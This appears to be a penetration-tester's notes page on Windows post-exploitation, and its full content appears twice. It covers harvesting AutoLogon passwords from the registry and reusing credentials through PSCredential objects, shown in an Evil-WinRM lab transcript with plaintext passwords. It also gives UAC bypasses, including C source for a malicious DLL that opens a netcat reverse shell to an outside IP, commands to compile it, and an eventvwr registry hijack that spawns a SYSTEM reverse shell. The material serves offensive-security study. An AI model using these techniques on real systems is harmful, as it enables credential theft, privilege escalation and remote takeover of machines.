Post Exploit Checks

Post Exploit

AutoLogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Enumerate open ports

netstat -ano

Powershell

PSCredentials

The PSCredentital Object is used to perform authenticated action / actions as another user in the machine

# create a PSCredential object
$password = ConvertTo-SecureString "DNOscp1234!" -AsPainText -Force
$credential = New-Object System.Management.Automation.PSCredential("Dhanesh", $password)

# Export the credential to XML File
$credential | Export-CliXml -Path 'C:\Location'

# Import the xml file to obtain password
$file = Import-CliXml -Path "C:\Location\File.xml"
$file.GetNetworkCredential() | fl

# Extra
$file | Get-Member

Execute Command as another user ( RUN-AS)

*Evil-WinRM* PS C:\PSTranscripts\20191203> whoami
megabank\melanie
*Evil-WinRM* PS C:\PSTranscripts\20191203> $password = ConvertTo-SecureString 'Serv3r4Admin4cc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\PSTranscripts\20191203> $cred = New-Object System.Management.Automation.PSCredential('ryan', $password)
*Evil-WinRM* PS C:\PSTranscripts\20191203> invoke-command -ScriptBlock { whoami } -Computer localhost -Credential $cred
megabank\ryan
*Evil-WinRM* PS C:\PSTranscripts\20191203> # resolute machine

Machine

Privilege Escalation

UAC

If a user belongs to the administrator groups and cannot execute the commands as Admin ( moving to Administrator's Desktop for eg.). Indicatest that there is a UAC is enabled
The bypass can also be checked with SharpUp.exe

The output of the sharpup.exe suggests the UAC can be bypassed

UAC Bypass

1. Mounting

With net use n: \\127.0.0.1\C$ -> mounts the C directory as a new share as n

2. DLL Hijacking

Create a malicious dll file

pwn.c

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved )
{
	switch(dwReason)
	{
		case DLL_PROCESS_ATTACHED: // A process is loading the DLL.
		// do stuff 
		WinExec("C:\\ProgramData\\nc.exe -e cmd.exe 10.10.14.9 1337", 0);
	        break;
        	
		case DLL_THREAD_ATTACHED: // A process is creating a new thread.
        	break;
        	
		case DLL_THREAD_DETACH: // A thread exits normally.
        	break;
        	
		case DLL_PROCESS_DETACH: // A process unloads the DLL.
        	break;
    	}
	return 0;
}

2. Compile the generated malicious dll

sudo apt-get install mingw-w64
i686-w64-mingw32-g++ pwn.c -lws2_32 -o srrstr.dll -shared

3. GreatSCT takes care of the rest

3. Akagi

Compile the binary and use to bypass

4. FileLess UAC Bypass

Windows 7

Fileless UAC bypass, without using any applications to bypass the UAC
The registries are being used to perform the action

# Summary:
- The eventvwr.exe when loading will look for the entry 
HKCU\Software\Classes\mscfile\shell\open\command in the registry
- By default, this registry won't exist so when analyzing with procmon,
the registry status will be set to **NAME NOT FOUND**
- The eventvwr also accesses the registry with high integrity ( accesses as
the system user)
- We can add a new entry to the registry and specify the command to be executed when
eventvwr.exe executed

Commands

# create a registry entry
reg add hkcu\software\classes\mscfile\shell\open\command

# provide the command to be executed 
reg add hkcu\software\classes\mscfile\shell\open\command /d "c:\windows\temp\nc.exe -e cmd.exe 10.10.10.10 1234"

# run eventvwr.exe to execute the command
eventvwr.exe

Shell will be obtained as NT Authority\System

PreviousPivoting ( ProxyChains )NextActive Directory ( Recon -> PE)

Last updated 2 years ago

Was this helpful?

Post Exploit Checks

Post Exploit

AutoLogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Enumerate open ports

netstat -ano

Powershell

PSCredentials

The PSCredentital Object is used to perform authenticated action / actions as another user in the machine

# create a PSCredential object
$password = ConvertTo-SecureString "DNOscp1234!" -AsPainText -Force
$credential = New-Object System.Management.Automation.PSCredential("Dhanesh", $password)

# Export the credential to XML File
$credential | Export-CliXml -Path 'C:\Location'

# Import the xml file to obtain password
$file = Import-CliXml -Path "C:\Location\File.xml"
$file.GetNetworkCredential() | fl

# Extra
$file | Get-Member

Execute Command as another user ( RUN-AS)

*Evil-WinRM* PS C:\PSTranscripts\20191203> whoami
megabank\melanie
*Evil-WinRM* PS C:\PSTranscripts\20191203> $password = ConvertTo-SecureString 'Serv3r4Admin4cc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\PSTranscripts\20191203> $cred = New-Object System.Management.Automation.PSCredential('ryan', $password)
*Evil-WinRM* PS C:\PSTranscripts\20191203> invoke-command -ScriptBlock { whoami } -Computer localhost -Credential $cred
megabank\ryan
*Evil-WinRM* PS C:\PSTranscripts\20191203> # resolute machine

Machine

Reel -

Privilege Escalation

UAC

If a user belongs to the administrator groups and cannot execute the commands as Admin ( moving to Administrator's Desktop for eg.). Indicatest that there is a UAC is enabled
The bypass can also be checked with SharpUp.exe

The output of the sharpup.exe suggests the UAC can be bypassed

UAC Bypass

General Methods by ivanitlearning -

1. Mounting

With net use n: \\127.0.0.1\C$ -> mounts the C directory as a new share as n

2. DLL Hijacking

Create a malicious dll file

pwn.c

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved )
{
	switch(dwReason)
	{
		case DLL_PROCESS_ATTACHED: // A process is loading the DLL.
		// do stuff 
		WinExec("C:\\ProgramData\\nc.exe -e cmd.exe 10.10.14.9 1337", 0);
	        break;
        	
		case DLL_THREAD_ATTACHED: // A process is creating a new thread.
        	break;
        	
		case DLL_THREAD_DETACH: // A thread exits normally.
        	break;
        	
		case DLL_PROCESS_DETACH: // A process unloads the DLL.
        	break;
    	}
	return 0;
}

2. Compile the generated malicious dll

sudo apt-get install mingw-w64
i686-w64-mingw32-g++ pwn.c -lws2_32 -o srrstr.dll -shared

3. GreatSCT takes care of the rest

3. Akagi

GitHub - hfiref0x/UACME: Defeating Windows User Account ControlGitHub

Compile the binary and use to bypass

4. FileLess UAC Bypass

Windows 7

Fileless UAC bypass, without using any applications to bypass the UAC
The registries are being used to perform the action
The detailed blog can be found .

# Summary:
- The eventvwr.exe when loading will look for the entry 
HKCU\Software\Classes\mscfile\shell\open\command in the registry
- By default, this registry won't exist so when analyzing with procmon,
the registry status will be set to **NAME NOT FOUND**
- The eventvwr also accesses the registry with high integrity ( accesses as
the system user)
- We can add a new entry to the registry and specify the command to be executed when
eventvwr.exe executed

Commands

# create a registry entry
reg add hkcu\software\classes\mscfile\shell\open\command

# provide the command to be executed 
reg add hkcu\software\classes\mscfile\shell\open\command /d "c:\windows\temp\nc.exe -e cmd.exe 10.10.10.10 1234"

# run eventvwr.exe to execute the command
eventvwr.exe

Shell will be obtained as NT Authority\System

PreviousPivoting ( ProxyChains )NextActive Directory ( Recon -> PE)

Last updated 2 years ago

Was this helpful?